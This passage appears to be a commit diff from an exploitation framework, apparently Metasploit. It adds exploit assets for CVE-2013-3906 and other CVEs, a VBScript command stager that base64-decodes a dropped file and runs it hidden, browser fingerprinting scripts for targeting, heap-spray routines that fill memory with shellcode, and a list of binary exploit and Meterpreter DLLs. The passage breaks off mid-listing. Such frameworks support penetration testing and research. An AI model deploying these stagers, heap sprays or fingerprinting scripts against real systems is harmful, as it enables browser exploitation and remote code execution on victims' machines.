<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
<a:themeElements>
<a:clrScheme name="Office">
<a:dk1>
<a:sysClr val="windowText" lastClr="000000"/>
</a:dk1>
<a:lt1>
<a:sysClr val="window" lastClr="FFFFFF"/>
</a:lt1>
<a:dk2>
<a:srgbClr val="1F497D"/>
</a:dk2>
<a:lt2>
<a:srgbClr val="EEECE1"/>
</a:lt2>
<a:accent1>
<a:srgbClr val="4F81BD"/>
</a:accent1>
<a:accent2>
<a:srgbClr val="C0504D"/>
</a:accent2>
<a:accent3>
<a:srgbClr val="9BBB59"/>
</a:accent3>
<a:accent4>
<a:srgbClr val="8064A2"/>
</a:accent4>
<a:accent5>
<a:srgbClr val="4BACC6"/>
</a:accent5>
<a:accent6>
<a:srgbClr val="F79646"/>
</a:accent6>
<a:hlink>
<a:srgbClr val="0000FF"/>
</a:hlink>
<a:folHlink>
<a:srgbClr val="800080"/>
</a:folHlink>
</a:clrScheme>
<a:fontScheme name="Office">
<a:majorFont>
<a:latin typeface="Cambria"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" ゴシック"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Times New Roman"/>
<a:font script="Hebr" typeface="Times New Roman"/>
<a:font script="Thai" typeface="Angsana New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="MoolBoran"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Times New Roman"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:majorFont>
<a:minorFont>
<a:latin typeface="Calibri"/>
<a:ea typeface=""/>
<a:cs typeface=""/>
<a:font script="Jpan" typeface=" 明朝"/>
<a:font script="Hang" typeface="맑은 고딕"/>
<a:font script="Hans" typeface="宋体"/>
<a:font script="Hant" typeface="新細明體"/>
<a:font script="Arab" typeface="Arial"/>
<a:font script="Hebr" typeface="Arial"/>
<a:font script="Thai" typeface="Cordia New"/>
<a:font script="Ethi" typeface="Nyala"/>
<a:font script="Beng" typeface="Vrinda"/>
<a:font script="Gujr" typeface="Shruti"/>
<a:font script="Khmr" typeface="DaunPenh"/>
<a:font script="Knda" typeface="Tunga"/>
<a:font script="Guru" typeface="Raavi"/>
<a:font script="Cans" typeface="Euphemia"/>
<a:font script="Cher" typeface="Plantagenet Cherokee"/>
<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
<a:font script="Tibt" typeface="Microsoft Himalaya"/>
<a:font script="Thaa" typeface="MV Boli"/>
<a:font script="Deva" typeface="Mangal"/>
<a:font script="Telu" typeface="Gautami"/>
<a:font script="Taml" typeface="Latha"/>
<a:font script="Syrc" typeface="Estrangelo Edessa"/>
<a:font script="Orya" typeface="Kalinga"/>
<a:font script="Mlym" typeface="Kartika"/>
<a:font script="Laoo" typeface="DokChampa"/>
<a:font script="Sinh" typeface="Iskoola Pota"/>
<a:font script="Mong" typeface="Mongolian Baiti"/>
<a:font script="Viet" typeface="Arial"/>
<a:font script="Uigh" typeface="Microsoft Uighur"/>
<a:font script="Geor" typeface="Sylfaen"/>
</a:minorFont>
</a:fontScheme>
<a:fmtScheme name="Office">
<a:fillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="50000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="35000">
<a:schemeClr val="phClr">
<a:tint val="37000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:tint val="15000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="1"/>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:shade val="51000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="80000">
<a:schemeClr val="phClr">
<a:shade val="93000"/>
<a:satMod val="130000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="94000"/>
<a:satMod val="135000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:lin ang="16200000" scaled="0"/>
</a:gradFill>
</a:fillStyleLst>
<a:lnStyleLst>
<a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr">
<a:shade val="95000"/>
<a:satMod val="105000"/>
</a:schemeClr>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
<a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:prstDash val="solid"/>
</a:ln>
</a:lnStyleLst>
<a:effectStyleLst>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="38000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
</a:effectStyle>
<a:effectStyle>
<a:effectLst>
<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
<a:srgbClr val="000000">
<a:alpha val="35000"/>
</a:srgbClr>
</a:outerShdw>
</a:effectLst>
<a:scene3d>
<a:camera prst="orthographicFront">
<a:rot lat="0" lon="0" rev="0"/>
</a:camera>
<a:lightRig rig="threePt" dir="t">
<a:rot lat="0" lon="0" rev="1200000"/>
</a:lightRig>
</a:scene3d>
<a:sp3d>
<a:bevelT w="63500" h="25400"/>
</a:sp3d>
</a:effectStyle>
</a:effectStyleLst>
<a:bgFillStyleLst>
<a:solidFill>
<a:schemeClr val="phClr"/>
</a:solidFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="40000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="40000">
<a:schemeClr val="phClr">
<a:tint val="45000"/>
<a:shade val="99000"/>
<a:satMod val="350000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="20000"/>
<a:satMod val="255000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
</a:path>
</a:gradFill>
<a:gradFill rotWithShape="1">
<a:gsLst>
<a:gs pos="0">
<a:schemeClr val="phClr">
<a:tint val="80000"/>
<a:satMod val="300000"/>
</a:schemeClr>
</a:gs>
<a:gs pos="100000">
<a:schemeClr val="phClr">
<a:shade val="30000"/>
<a:satMod val="200000"/>
</a:schemeClr>
</a:gs>
</a:gsLst>
<a:path path="circle">
<a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
</a:path>
</a:gradFill>
</a:bgFillStyleLst>
</a:fmtScheme>
</a:themeElements>
<a:objectDefaults/>
<a:extraClrSchemeLst/>
</a:theme>

4
data/exploits/CVE-2013-3906/word/webSettings.xml Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:optimizeForBrowser/>
</w:webSettings>

49
data/exploits/cmdstager/vbs_b64_noquot Executable file
View File

@ -0,0 +1,49 @@
echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub
echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub
echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub
echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub
echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub
echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub
echo tempString = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub
echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub
echo Set wshShell = CreateObject(scriptShell) >>decode_stub
echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub
echo Set fs = CreateObject(scriptingFS) >>decode_stub
echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub
echo If file.Size Then >>decode_stub
echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub
echo data = fd.ReadAll >>decode_stub
echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub
echo data = Replace(data, vbCrLf, nil) >>decode_stub
echo data = base64_decode(data) >>decode_stub
echo fd.Close >>decode_stub
echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub
echo ofs.Write data >>decode_stub
echo ofs.close >>decode_stub
echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub
echo Else >>decode_stub
echo Wscript.Echo emptyString >>decode_stub
echo End If >>decode_stub
echo Function base64_decode(byVal strIn) >>decode_stub
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
echo If Not w2 Then _ >>decode_stub
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
echo If Not w3 Then _ >>decode_stub
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
echo If Not w4 Then _ >>decode_stub
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
echo Next >>decode_stub
echo base64_decode = strOut >>decode_stub
echo End Function >>decode_stub
echo Function mimedecode(byVal strIn) >>decode_stub
echo If Len(strIn) = 0 Then >>decode_stub
echo mimedecode = -1 : Exit Function >>decode_stub
echo Else >>decode_stub
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
echo End If >>decode_stub
echo End Function >>decode_stub

BIN
data/exploits/cve-2013-0074/SilverApp1.dll Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2013-0074/SilverApp1.xap Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2013-3660/exploit.dll
View File

Binary file not shown.

BIN
data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll Executable file
View File

Binary file not shown.

89
data/js/detect/ie_addons.js Normal file
View File

@ -0,0 +1,89 @@
window.ie_addons_detect = { };
/**
* Returns true if this ActiveX is available, otherwise false.
* Grabbed this directly from browser_autopwn.rb
**/
window.ie_addons_detect.hasActiveX = function (axo_name, method) {
var axobj = null;
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
axobj = document.createElement("object");
axobj.setAttribute("classid", "clsid:" + axo_name);
axobj.setAttribute("id", axo_name);
axobj.setAttribute("style", "visibility: hidden");
axobj.setAttribute("width", "0px");
axobj.setAttribute("height", "0px");
document.body.appendChild(axobj);
if (typeof(axobj[method]) == 'undefined') {
var attributes = 'id="' + axo_name + '"';
attributes += ' classid="clsid:' + axo_name + '"';
attributes += ' style="visibility: hidden"';
attributes += ' width="0px" height="0px"';
document.body.innerHTML += "<object " + attributes + "></object>";
axobj = document.getElementById(axo_name);
}
} else {
try {
axobj = new ActiveXObject(axo_name);
} catch(e) {
// If we can't build it with an object tag and we can't build it
// with ActiveXObject, it can't be built.
return false;
};
}
if (typeof(axobj[method]) != 'undefined') {
return true;
}
return false;
};
/**
* Returns the version of Microsoft Office. If not found, returns null.
**/
window.ie_addons_detect.getMsOfficeVersion = function () {
var version;
var types = new Array();
for (var i=1; i <= 5; i++) {
try {
types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
}
catch (e) {
types[i-1] = null;
}
}
if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == 'object')
{
version = "2012";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == 'object' && types[4] == null)
{
version = "2010";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
types[3] == null && types[4] == null)
{
version = "2007";
}
else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
types[3] == null && types[4] == null)
{
version = "2003";
}
else if (types[0] == 'object' && types[1] == null && types[2] == null &&
types[3] == null && types[4] == null)
{
// If run for the first time, you must manullay allow the "Microsoft Office XP"
// add-on to run. However, this prompt won't show because the ActiveXObject statement
// is wrapped in an exception handler.
version = "xp";
}
else {
version = null;
}
return version;
}

110
data/js/detect/misc_addons.js Normal file
View File

@ -0,0 +1,110 @@
window.misc_addons_detect = { };
/**
* Detects whether the browser supports Silverlight or not
**/
window.misc_addons_detect.hasSilverlight = function () {
var found = false;
//
// When on IE, we can use AgControl.AgControl to actually detect the version too.
// But this ability is specific to IE, so we fall back to just true/false response
//
try {
var ax = new ActiveXObject('AgControl.AgControl');
found = true;
} catch(e) {}
//
// ActiveX didn't get anything, try looking in MIMEs
//
if (!found) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i < mimes.length; i++) {
if (/x\-silverlight/.test(mimes[i].type)) {
found = true;
break;
}
}
}
//
// MIMEs didn't work either. Try navigator.
//
if (!found) {
var count = navigator.plugins.length;
for (var i=0; i < count; i++) {
var pluginName = navigator.plugins[i].name;
if (/Silverlight Plug\-In/.test(pluginName)) {
found = true;
break;
}
}
}
return found;
}
/**
* Returns the Java version
**/
window.misc_addons_detect.getJavaVersion = function () {
var foundVersion = null;
//
// This finds the Java version from Java WebStart's ActiveX control
// This is specific to Windows
//
for (var i1=0; i1 < 10; i1++) {
for (var i2=0; i2 < 10; i2++) {
for (var i3=0; i3 < 10; i3++) {
for (var i4=0; i4 < 10; i4++) {
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
var progId = "JavaWebStart.isInstalled." + version;
try {
new ActiveXObject(progId);
return version;
}
catch (e) {
continue;
}
}}}}
//
// This finds the Java version from window.navigator.mimeTypes
// This seems to work pretty well for most browsers except for IE
//
if (foundVersion == null) {
var mimes = window.navigator.mimeTypes;
for (var i=0; i<mimes.length; i++) {
var m = /java.+;version=(.+)/.exec(mimes[i].type);
if (m) {
var version = parseFloat(m[1]);
if (version > foundVersion) {
foundVersion = version;
}
}
}
}
//
// This finds the Java version from navigator plugins
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
// So we do this last.
//
if (foundVersion == null) {
var foundJavaString = "";
var pluginsCount = navigator.plugins.length;
for (i=0; i < pluginsCount; i++) {
var pluginName = navigator.plugins[i].name;
var pluginVersion = navigator.plugins[i].version;
if (/Java/.test(pluginName) && pluginVersion != undefined) {
foundVersion = navigator.plugins[i].version;
break;
}
}
}
return foundVersion;
}

49
lib/rex/exploitation/javascriptosdetect.js → data/js/detect/os.js
View File

@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
return d.style[propCamelCase] === css; return d.style[propCamelCase] === css;
} }
var input_type_is_valid = function(input_type) {
if (!document.createElement) return false;
var input = document.createElement('input');
input.setAttribute('type', input_type);
return input.type == input_type;
}
//-- //--
// Client // Client
//-- //--
@ -203,32 +210,46 @@ window.os_detect.getVersion = function(){
// Thanks to developer.mozilla.org "Firefox for developers" series for most // Thanks to developer.mozilla.org "Firefox for developers" series for most
// of these. // of these.
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/ // Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
if ('HTMLTimeElement' in window) { if (css_is_valid('image-orientation',
ua_version = '22.0' 'imageOrientation',
'0deg')) {
ua_version = '26.0';
} else if (css_is_valid('background-attachment',
'backgroundAttachment',
'local')) {
ua_version = '25.0';
} else if ('DeviceStorage' in window && window.DeviceStorage &&
'default' in window.DeviceStorage.prototype) {
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
ua_version = '24.0';
} else if (input_type_is_valid('range')) {
ua_version = '23.0';
} else if ('HTMLTimeElement' in window) {
ua_version = '22.0';
} else if ('createElement' in document && } else if ('createElement' in document &&
document.createElement('main') && document.createElement('main') &&
document.createElement('main').constructor === window['HTMLElement']) { document.createElement('main').constructor === window['HTMLElement']) {
ua_version = '21.0' ua_version = '21.0';
} else if ('imul' in Math) { } else if ('imul' in Math) {
ua_version = '20.0' ua_version = '20.0';
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) { } else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
ua_version = '19.0' ua_version = '19.0';
} else if ('devicePixelRatio' in window) { } else if ('devicePixelRatio' in window) {
ua_version = '18.0' ua_version = '18.0';
} else if ('createElement' in document && } else if ('createElement' in document &&
document.createElement('iframe') && document.createElement('iframe') &&
'sandbox' in document.createElement('iframe')) { 'sandbox' in document.createElement('iframe')) {
ua_version = '17.0' ua_version = '17.0';
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) { } else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
ua_version = '16.0' ua_version = '16.0';
} else if ('HTMLSourceElement' in window && } else if ('HTMLSourceElement' in window &&
HTMLSourceElement.prototype && HTMLSourceElement.prototype &&
'media' in HTMLSourceElement.prototype) { 'media' in HTMLSourceElement.prototype) {
ua_version = '15.0' ua_version = '15.0';
} else if ('mozRequestPointerLock' in document.body) { } else if ('mozRequestPointerLock' in document.body) {
ua_version = '14.0' ua_version = '14.0';
} else if ('Map' in window) { } else if ('Map' in window) {
ua_version = "13.0" ua_version = "13.0";
} else if ('mozConnection' in navigator) { } else if ('mozConnection' in navigator) {
ua_version = "12.0"; ua_version = "12.0";
} else if ('mozVibrate' in navigator) { } else if ('mozVibrate' in navigator) {
@ -850,6 +871,12 @@ window.os_detect.getVersion = function(){
os_flavor = "7"; os_flavor = "7";
os_sp = "SP1"; os_sp = "SP1";
break; break;
case "10016720":
// IE 10.0.9200.16721 / Windows 7 SP1
ua_version = "10.0";
os_flavor = "7";
os_sp = "SP1";
break;
case "1000": case "1000":
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release // IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
ua_version = "10.0"; ua_version = "10.0";

17
data/js/memory/heap_spray.js Normal file
View File

@ -0,0 +1,17 @@
var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}

31
data/js/memory/mstime_malloc.js Normal file
View File

@ -0,0 +1,31 @@
function mstime_malloc(oArg) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
var buf = "";
for (var i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";#W00TA";
}
}
var e = document.getElementById(objId);
if (e == null) {
var eleId = "W00TB"
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}

38
data/js/memory/property_spray.js Normal file
View File

@ -0,0 +1,38 @@
var sym_div_container;
function sprayHeap( oArg ) {
var shellcode = oArg.shellcode;
var offset = oArg.offset;
var heapBlockSize = oArg.heapBlockSize;
var maxAllocs = oArg.maxAllocs;
var objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
sym_div_container = document.getElementById(objId);
if (sym_div_container == null) {
sym_div_container = document.createElement("div");
}
sym_div_container.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
sym_div_container.appendChild(obj);
}
}

18
data/js/network/ajax_download.js Normal file
View File

@ -0,0 +1,18 @@
function ajax_download(oArg) {
if (!oArg.method) { oArg.method = "GET"; }
if (!oArg.path) { throw "Missing parameter 'path'"; }
if (!oArg.data) { oArg.data = null; }
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(oArg.method, oArg.path, false);
xmlHttp.send(oArg.data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}

10
data/js/network/ajax_post.js Normal file
View File

@ -0,0 +1,10 @@
function postInfo(path, data) {
var xmlHttp = new XMLHttpRequest();
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open('POST', path, false);
xmlHttp.send(data);
}

15
data/js/network/xhr_shim.js Normal file
View File

@ -0,0 +1,15 @@
if (!window.XMLHTTPRequest) {
(function() {
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
for (idx = 0; idx < activeObjs.length; idx++) {
try {
new ActiveXObject(activeObjs[idx]);
window.XMLHttpRequest = function() {
return new ActiveXObject(activeObjs[idx]);
};
break;
}
catch (e) {}
}
})();
}

126
data/js/utils/base64.js Normal file
View File

@ -0,0 +1,126 @@
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\r\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};

BIN
data/meterpreter/common.lib Executable file
View File

Binary file not shown.

BIN
data/meterpreter/elevator.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x64.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll Executable file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
